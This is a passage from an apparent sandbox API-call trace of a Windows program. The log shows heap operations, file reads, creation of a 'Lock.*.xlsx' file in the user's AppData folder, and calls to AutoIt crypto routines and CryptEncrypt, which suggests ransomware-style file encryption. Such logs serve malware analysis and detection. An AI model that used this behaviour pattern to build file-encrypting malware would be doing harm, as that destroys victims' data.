lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0242.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0242.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0242.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0242.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0242.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0242.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0242.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0242.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0242.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0242.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0242.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0242.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0242.074] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0242.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0242.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0242.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0242.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0242.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0242.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0242.076] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.ZTd7YZt.xlsx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.ztd7yzt.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0242.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0242.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0242.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0242.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0242.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0242.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0242.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0242.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0242.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0242.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0242.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0242.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0242.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0242.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0242.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0242.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0242.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0242.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0242.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0242.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0242.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0242.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0242.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0242.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0242.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0242.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0242.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0242.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0242.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0242.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5c020 [0242.079] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0242.079] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0xc394, lpOverlapped=0x0) returned 1 [0242.083] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0242.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0242.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0242.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0242.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0242.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc394) returned 0x2f14818 [0242.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5c020 | out: hHeap=0x970000) returned 1 [0242.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0242.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0242.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0242.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0242.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0242.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0242.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0242.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0242.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc394) returned 0x2f20bb8 [0242.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0242.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0242.086] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0242.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0242.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0242.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0242.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0242.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc394) returned 0x2f14818 [0242.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0242.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0242.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0242.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0242.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0242.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0242.086] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0242.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0242.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0242.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0242.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0242.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0242.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0242.086] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0242.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04690 [0242.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0242.087] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0242.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0242.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0242.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0242.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0242.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0242.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0242.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0242.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0242.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc394) returned 0x2f14818 [0242.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0242.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54dc8 [0242.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0242.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0242.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0242.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550a8 [0242.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0242.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0242.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0242.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f68 [0242.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0242.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0242.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0242.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0242.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0242.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0242.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0242.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0242.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0242.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc394) returned 0x2f2cf58 [0242.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0242.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0242.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0242.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0242.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0242.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0242.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0242.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0242.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0242.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0242.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0242.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0242.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0242.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0242.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0242.089] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0242.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0242.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0242.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0242.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0242.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0242.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0242.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0242.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0242.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0242.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0242.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0242.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0242.090] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0242.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0242.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0242.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0242.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0242.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0242.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0242.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0242.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0242.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0242.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0242.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0242.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0242.091] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0242.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0242.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0242.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0242.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0242.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0242.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0242.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0242.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0242.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0242.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0242.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0242.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0242.091] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0242.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0242.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0242.092] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.092] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.092] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0242.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0242.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0242.092] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0242.092] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0242.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0242.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0242.093] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0242.093] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0242.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0242.093] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0242.271] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0242.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0242.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0242.272] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0242.272] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0242.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0242.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0242.272] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0242.272] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.272] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.273] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0242.273] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.273] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0242.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0242.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0242.273] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0242.274] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0242.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51568, cbMultiByte=13, lpDefaultChar=0x0, 